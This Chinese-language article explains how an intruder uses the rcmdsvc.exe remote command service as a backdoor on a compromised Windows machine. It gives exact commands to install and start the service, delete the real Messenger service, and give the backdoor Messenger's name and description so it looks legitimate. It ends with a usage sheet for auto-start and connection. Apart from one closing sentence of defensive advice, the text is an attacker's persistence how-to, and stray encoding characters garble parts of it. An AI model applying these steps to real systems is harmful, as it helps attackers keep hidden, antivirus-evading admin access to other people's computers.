windows自帶的rcmd使用方法整理
2020-07-10 20:33:53
供稿:網友
rcmdsvc.exe是Windows 2000 Resource Kit中的一個小工具���,是用來開啟Remote Command Service服務的。這個服務開啟的端口是445����,與Windows 2000系統的Microsoft-DS服務開的端口一樣。因為是Microsoft發布的服務���,所以根本沒有殺毒 軟件會認為這是病毒或者木馬��,因此不少入侵者都把這個服務作為入侵后的后門使用���。
下面將從入侵者的角度講一下這個服務的安裝、使用方法以及如何偽裝成另外一個服務��,從而讓大家知道該如何防范����。
rcmdsvc.exe安裝
假設服務器被入侵后,入侵者把以后需要用到的rcmdsvc.exe等一些工具都放到了C盤根目錄下�,在cmd窗口里輸入:rcmdsvc -install,回車后�,即可看到Remote Command Service服務安裝成功的提示,
這時在“控制面板”→“管理工具”→“服務”里���,就可以看到這個服務了��。
從圖1可以看到該服務并沒有啟動��,還需要我們來啟動該服務�����,可以使用系統自帶的net命令�,在cmd窗口里輸入:net start rcmdsvc,回車��,我們可以看到Remote Command Service服務開始啟動和成功��。
rcmdsvc.exe使用方法
下面我們就可以用Windows 2000 Resource Kit中的rcmd.exe小工具進行遠程連接了�,并且連接后擁有管理員權限,可以添加管理員用戶�����。
rcmdsvc.exe偽裝
下面該sc.exe(Service Control的縮寫)出場了���,這個工具是在命令行方式下管理系統中的服務的,在Windows 2000 Resource Kit或者Windows XP中都可以找到該工具�����。來看一下sc.exe是如何把Remote Command Service服務偽裝成Messenger這個服務的。
1.刪除Messenger服務�。在cmd窗口里輸入:sc delete Messenger,回車��,可以看到命令完成�����。
2.把Remote Command Service服務改名為Messenger����,在進行這步前,需要重新啟動一下�。在cmd窗口里輸入:sc config rcmdsvc DisplayName= Messenger,回車�,可以看到命令完成。這時候我們到“控制面板”→“管理工具”→“服務”里����,就可以看到Remote Command Service服務名變成了Messenger。但是“描述”的內容為空�。為了使這個服務看起來更“合法”,我們把Messenger的“描述”也加上��,在cmd窗口里輸入:sc description rcmdsvc 發送和接收系統管理員或者“警報器”服務傳遞的消息。我們到“服務”里就可以看到rcmdsvc的“描述”被加上了Messenger的描述�����。只不過服務名稱還是rcmdsvc���。
3.再重新用net start命令啟動一下rcmdsvc服務�,就可以用rcmd.exe進行連接了��。
為了避免電腦被入侵�����,把不需要的服務都關閉掉�,經常檢查一下開啟的服務和端口,如果您經過檢查發現您的電腦有rcmdsvc服務��,或者該服務被偽裝成了別的服務��,那就要小心了���,說明電腦很可能被入侵了,并被別人安裝上了殺毒 軟件無法查出的“合法”后門
rcmdsvc.exe使用方法:
1��、rcmdsvc /install //安裝后的服務名為:Remote Command Service (rcmdsvc),建議上傳至windows目錄
怎么用命令行改服務名和描述:
sc //127.0.0.1 query rcmdsvc //查詢整個服務
sc //127.0.0.1 qdescription rcmdsvc //查詢服務的描述
sc //127.0.0.1 description rcmdsvc "管理和編錄可移動媒
體并操作自動化可移動媒體設備。如果這個服務被停止���,依賴可移動存儲的程序�����,如備份和
遠程存儲將放慢速度�。如果禁用這個服務���,所有專依賴這個服務的服務將無法啟動�。" //修改服務的描述
D:/pt007/f/Pstools2.11>psservice //127.0.0.1 setconfig rcmdsvc auto //設置服務為自動啟動
2�����、net start rcmdsvc
3���、rcmd //127.0.0.1 ver
